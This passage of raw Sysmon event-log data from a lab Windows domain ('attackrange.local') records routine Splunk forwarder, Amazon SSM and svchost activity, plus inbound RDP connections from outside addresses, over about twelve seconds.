09:07:56.013{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.013{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.013{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.013{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89EB-6151-1C7A-00000000FC01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.013{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89EB-6151-1C7A-00000000FC01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.999{5EBD8912-89EB-6151-1C7A-00000000FC01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.873{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53302-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001049415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:57.712{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:57.581{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31BB4AE36A50CAED5870ADCA7166EAF,SHA256=193CC1CA0191D85D4AB5F7FC3633C752A2B90CB46B68F5D92DCE4BB60A1A48AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978035Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:57.587{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4304MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978034Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:57.429{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A3EB997A8C87097EC4BC1819460DB9,SHA256=6404CBE44EB7D595E0B38E0449EEF5AEB8C701913FB3EC69B4187685E5F89AC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978033Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:54.192{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52110-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978032Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:57.366{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39895A90012B8284AC0D4556ACC3B762,SHA256=91EB23D46C085FB9646302A6BEDDC641AAE82228E22F0D20CCD6DE2BC893B2B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978031Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:57.366{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C7F20AE4121DBF44418AC440348E4B2,SHA256=C91D0EFB0F5F67B37246109C14F1324E841AC26FEEE7922B8C01166E639C3BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:58.627{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5566C9C1B9B16F9EEA66B798060C53,SHA256=63DCC69722CC9375FE445A560A7963989162329DAF5382783DDD6CAE363CD09A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978038Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:58.601{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4305MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978037Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:55.589{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54933-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978036Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:58.444{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65ACAE45EA1A5BCCAC84C9F298D2ACA,SHA256=6E4473CE9FCDF7BB6069295529DD195FA927AF31605BD115C6F70305AF4D878D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:57.926{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53759-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:59.662{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56D184237E8BFC2E51A474FBC7FB7005,SHA256=19DC296002AD900846556157C3CF66E2044674365CE28B80114D0A079525CBC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:59.643{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE07CC8ADB8823401C524CE0957B28D5,SHA256=15C7C3B30FF365B6A0387B2AF9862AEC393E5C5A68439947BFC3035C9D43DF36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978039Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:59.663{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E99C9DC1D6631BF837FCC97447273F51,SHA256=68BC62EC91F5A4CBED0DA8140B7432043B80C3C651B5F0861D397DBC4A3FFE51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:00.661{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FB153E69BDFEFFC5C349D7AC3461C0F,SHA256=E056CA2196080479B863F69928336E94C4F2124D8E3F8CC902525DFB58B0C4C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978041Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:00.898{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=225AAF3948E0028D8A1E0B6C8568C30A,SHA256=EC56502CCF6C255D333FBC81ED9A609866AB6F31937B906D84A9A6010541E5B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978040Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:56.854{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59335-false10.0.1.12-8000- 23542300x80000000000000001049422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:01.695{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2559CC1B870F705B602F67AF7575EBA1,SHA256=05F81BECA73572B7BD037C5EC21331F4C74C27CF84069D026826D0582970CBA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:02.710{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B076BCCCE6E146C06E97813F4895455,SHA256=C16581144110C89F5B8BC98060C7334D4783D2B0A1D65BBFD5F7137D490F19BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978045Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:00.140{69CF5F33-7F2B-614D-3800-00000000FD01}2628C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59338-false169.254.169.254-80http 354300x8000000000000000978044Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:00.106{69CF5F33-7F2B-614D-3800-00000000FD01}2628C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59337-false169.254.169.254-80http 354300x8000000000000000978043Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:00.105{69CF5F33-7F2B-614D-3800-00000000FD01}2628C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59336-false169.254.169.254-80http 23542300x8000000000000000978042Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:02.016{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAE68B17FCF3D1FC9AA751EF46B83465,SHA256=DF2A6C3111A6AEA64D850FB8145336FF8A3FCDAFAEB2489D845E6F400F16712F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:03.725{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BAE114AC3CD25EBDC537C1C4B9EF0E8,SHA256=1BFC903120A1FEDE0F62F9CC811934B2911B74ECAC08C20A64BA0EAEDAC05F7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978047Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:00.252{69CF5F33-7F2B-614D-3800-00000000FD01}2628C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59339-false169.254.169.254-80http 23542300x8000000000000000978046Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:03.049{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07017352766C89CA2ACE0107E5F80274,SHA256=08AC1E09ED1C80ECAF8D542B090FC5A9A62FB7D545F91C79113EAA8CDA12F279,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:00.903{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53303-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:04.794{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AD905CA595788919682B06AD80687A6,SHA256=BAA6DD807CD2D12B0C2DF7E32E8A2B4A0BA38F74D3BFD47EEC71BCD7F7D05B39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:04.794{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97524DD9AE3D1755A389BF8A543FEA32,SHA256=FEAC4D9254ED91B67F2F9E5AF97277E90386D70C2156C33AF8BC883D5F45FE7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:04.741{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9CE7937B121B397BBB3E4B314073DDA,SHA256=E31C92BD6D30EF1F0FB66F1A4192151046B3357AFFC14239FCED4E9BBFF96852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978048Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:04.205{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC52DA54E5847DFD500B6AC22EC94EB6,SHA256=FBF2BFFB34374F6369DD8F28F3A42DB69E097B6AF1B7AE6DE4380DF87B52B777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:05.825{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AD905CA595788919682B06AD80687A6,SHA256=BAA6DD807CD2D12B0C2DF7E32E8A2B4A0BA38F74D3BFD47EEC71BCD7F7D05B39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:05.778{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5B43E00E4296E5A383A7AD6B9F3A9EA,SHA256=4396CBD9E8803BB25260922F1AE065ABEEDBBBD48DBD397A5009E12089D14397,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978050Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:02.771{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59340-false10.0.1.12-8000- 23542300x8000000000000000978049Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:05.221{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F06465DA821B4A3A88F74B357AE81B,SHA256=7FB8D5E6E10C0EAFCC7240729CECAC73BB581C11C59D9352007ADF9E0B17B6B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:03.212{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-60773-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:06.824{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA17A1CF6165A3884706AB65280BB77,SHA256=C6B8B31C32AE0BEA01662BA25398222045C9CC17BD0322FCF18AD42DA1A42B1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978051Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:06.236{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C6407BCC4B5300873A2054E47757736,SHA256=6CBB79D752FB4D423E37377A4BFAB626812C54CD6B34760CB30C10B7A5C7018F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:04.178{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60740-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:07.840{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=490F8EEEC65FFED415F1A0352496FECE,SHA256=D05527D406CECAA9615596164CD5E63F8DFC8646E28EA68D3E92DB8BCD5BEA87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978052Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:07.236{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4632308A6763823C71CA105362BB324,SHA256=D6D51AB8805514AD9F755CAA3F18825F910A9135995F1706B2F66BF8D2D31DCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:08.858{5EBD8912-7F53-614D-7700-00000000FC01}2312NT 